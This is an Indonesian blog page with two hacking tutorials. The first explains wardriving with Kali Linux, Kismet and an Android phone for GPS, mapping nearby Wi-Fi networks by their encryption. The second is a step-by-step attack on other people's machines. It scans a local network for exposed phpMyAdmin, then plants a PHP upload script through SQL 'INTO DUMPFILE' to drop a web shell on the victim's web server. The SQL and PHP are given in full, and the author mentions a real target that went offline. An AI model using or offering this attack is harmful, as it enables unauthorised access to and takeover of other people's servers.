Wednesday, May 24, 2017

How to WarDriving with KALI LINUX 2.0 & ANDROID Smartphone


Kesempatan kali ini saya mau share cara melakukan WARDRIVING menggunakan KALI LINUX 2.0 dan ANDROID SMARTPHONE.

1. Bahan yang dibutuhkan untuk melakukan war driving yaitu:
  • Laptop dengan OS KALI LINUX 2.0
  • USB Wireless Adapter support monitoring n injection (ane pake Alfa AWUS036NHA)
  • Smartphone Android (ane pakai Samsung Galaxy S5)

2. Jangan lupa untuk menginstall BlueNMEA pada sistem android anda, bisa di cari di google playstore gratissss...

3. setelah itu pada terminal install beberapa aplikasi dibawah ini:
  • gpsd
  • gpsd-clients
  • android-sdk
~# apt-get update && apt-get install android-sdk gpsd gpsd-clients
4. Langkah selanjutnya adalah hubungkan smartphone dan usb wireless ke laptop, aktiftan USB DEBUGGING MODE pada smartphone, aktifkan tethering android serta jalankan aplikasi blueNMEA yang telah terinstal tadi

5. Kemudian pada terminal ketik kode dibawah ini untuk menginstall adb yaitu android debug bridge
 ~# android
Kemudian akan terbuka jendela android SDK manager, pilih/centang Android SDK Tools dan Android SDK Platforms Tools. klik updates dan klik install.


6. Setelah terinstall kita jalankan adb tadi dengan mengetik kode dibawah ini:
~# cd /usr/share/android-sdk/platform-tools/
~# ./adb devices
~# ./adb forward tcp:4352 tcp:4352  
  
7. Setelahnya jangan lupa untuk mengaktifkan mode monitoring wireless adapter kita yaitu dengan mengetik kode dibawah ini:
~# airmon-ng check kill
~# airmon-ng start wlan1 
(wlan1 karena menggunakan wireless adapter usb, wlan0 adalah wireless adaptor laptop)


8. Kemudian jalankan gpsd untuk menshare gps android sistem dengan sistem kali linux 2.0 yang kita miliki, dengan menggunakan kode dibawah ini:
~# service gpsd stop
~# gpsd -N -n -D 5 tcp://localhost:4352
Jika berhasil maka pada terminal akan tampak seperti dibawah ini:


Dan pada smart phone android akan tampak seperti dibawah ini:


9. Langkah selanjutnya adalah menjalankan kismet pada terminal baru untuk menangkap sinyal wifi, dengan menggunakan kode dibawah ini:
~# kismet
Setelah berjalan akan tampak seperti gambar dibawah ini, garis merah menandakan gps terhubung dengan kali linux 2.0 kita


10. Setelah itu kita bisa melakukan wardriving dengan kendaraan roda empat. Karena saya belom ada mobil jadi hanya dilakukan ditempat 

11. setelah selesai melakukan wardriving maka langkah selanjutnya adalah membaca hasil dari wardrving yang telah dilakukan.
Pertama : matikan kismet dan gpsd dengan menekan CTRL-C
Kedua : melihat hasil capture dari kismet, file yang akan digunakan adalah file berekstensi .netxml
Ketiga : mengubah file ekstensi .netxml ke file ekstensi .kml agar bisa terbaca pada google earth. caranya adalah
~# ls
~# giskismet -x Kismet-20151118-16-18-34-1.netxml
~# giskismet -q "select * from wireless" -o tutor1.kml
hasil diatas akan tampak seperti gambar dibawah ini:


kemudian buka folder home dan copy-paste tutor1.kml untuk dibuka di google earth.


karena di linux belum terintall google earth maka ane buka lewat smart phone ane dan hasilnya tampak seperti gambar dibawah ini:


Keterangan warna :
  1. Merah bahwa AP tidak terenkripsi
  2. Orange bahwa AP terenkripsi dengan WEP
  3. Hijau bahwa AP terenkripsi dengan WPA/WPA2
Sekian Tutorial dari saya maaf kalo sedikit berantakan
Semoga Bermanfaat...
Thanks.

Inject Backdoor via PHPMYADMIN


Pertama saya ingin memberikan keterangan apa itu Backdoor, karena kita akan membahas seputar Backdoor untuk menggunakan tutorial dibawah ini.

Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi.

Oke singkat cerita kita akan langsung masuk inti penjelasannya, yang sesuai judul. Peralatan tambahan yang digunakann :

  • Angry Ip Scanner
  • Sedikit Script
  • Shell Backdoor (Disini ane menggunkana shell 3CArmy)
Pertama kita cari dulu targetnya menggunakan Anggry Ip Scanner, Set Anggry Ip Scannernya seperti gambar di bawah ini :
Menu tools  >>> Preferences >> Pada tab port tambahkan port yg akan kita scan
berhubung server pada localhost biasanya menggunakan port 80 / 8080 maka settingan punya sendiri dibuat begini :


Kemudian pada tab display pilih yang host with open port only


Selanjutnya balik lagi pada menu tool >>>  Fetchers
Pindahkan web detect ke sebelah kiri seperti di gambar


oke , untuk setingan Anggry Ip Scanner nya selesai ... 
Selanjutnya sebagai dasar untuk scann, disini ane menggunakan IP ane sendiri , misal IP ane 192.168.52.100 maka pada Angry Ip Scanner ane buat jadi seperti ini :


kemudian scan dan cari yg seperti ini :


yap .. yang port apachenya open tentunya , karna dari situlah kita masuk 

NB : Tidak semua juga yang bisa , ada yg phpmyadminnya di password , ada yg memang hanya bisa di akses dari localhost/pc korban itu sendiri ( xampp terbaru kalo gak salah )

setelah mendapatkan target, buka ip target tersebut di web browser, maka kita akan masuk ke halaman awal web servernya ( xampp, appserv, etc )


oke , disini kita mulai bermain dengan comand sql nya ...
Pertama kita buat database baru untuk tempat backdoor yang akan kita masukkan
create database userform

NB : userform adalah nama database yang dibuat

Kemudian kita buat tabel dan collumnya dengan cara klik pada database yang sudah kita buat kemudian pilih SQL dan masukkan comand :
CREATE TABLE `userform`.`user` (
`form` longtext not null
) ENGINE = MYISAM ;
klik Go

NB: userform = nama database , user = nama tabel , form = nama column ( silahkan buat sesuka anda ), longtext = jenis data ( ane buat longtext karna script uploadnya lumayan panjang)

selanjutnya kita cek basedir nya dimana dengan comand :
select @@datadir
pada contoh ini ada di C:\xampp\mysql\data\



artinya target menggunkan xampp , dan dir xampp biasanya di : C:/xampp/htdocs
oke .. selanjutnya masih di tabel user, klik SQL dan masukkan script di bawah ini :
INSERT INTO `userform`.`user` (
`form`
)
VALUES (
'<title>Upload File</title>
<style type="text/css">
<!--
body,td,th {
color: #0F0;
}
body {
background-color: #999;
}
-->
</style><p>
<form method="POST" action="" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
<p>
<strong>
<?php
if ($_FILES[''file''] != '''') {
copy($_FILES[''file''][''tmp_name''], $_FILES[''file''][''name'']) or die (''Proses upload Gagal: '');
}else {
die(''Silahkan pilih file'');
}
?>
File berhasil diupload:<br />
Keterangan File:<br />
Nama File: <?php echo $_FILES[''file''][''name'']; ?><br />
Ukuran File: <?php echo $_FILES[''file''][''size''];?> Bytes <br />
Jenis File: <?php echo $_FILES[''file''][''type'']; ?></strong></p>
'
);
itu adalah script buat ngupload file backdoor kita nantinya ...

Jika sukses maka akan muncul seperti ini :


Next Step masih di tabel user, buka lagi comand SQL dan masukkan comand :
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user
NB: 
C:/xampp/htdocs/ = dir xampp ( karna korban menggunakan xampp pada tutorial ini )
upload.php = nama file untuk script upload yg kita masukkan tadi pada langkah sebelumnya
from user = from (nama tabel)

Kemudian klik Go

Coba buka urlnya : victimip/upload.php
terahir silahkan upload shell anda , untuk akses shell : victimip/namashell.php

Maaf untuk beberapa step terakhir gak ada gambarnya dikarenakan target udah offline. Jadi hal ini hanya bisa dilakukan selama target online dan menjalankan server apachenya...

 
biz.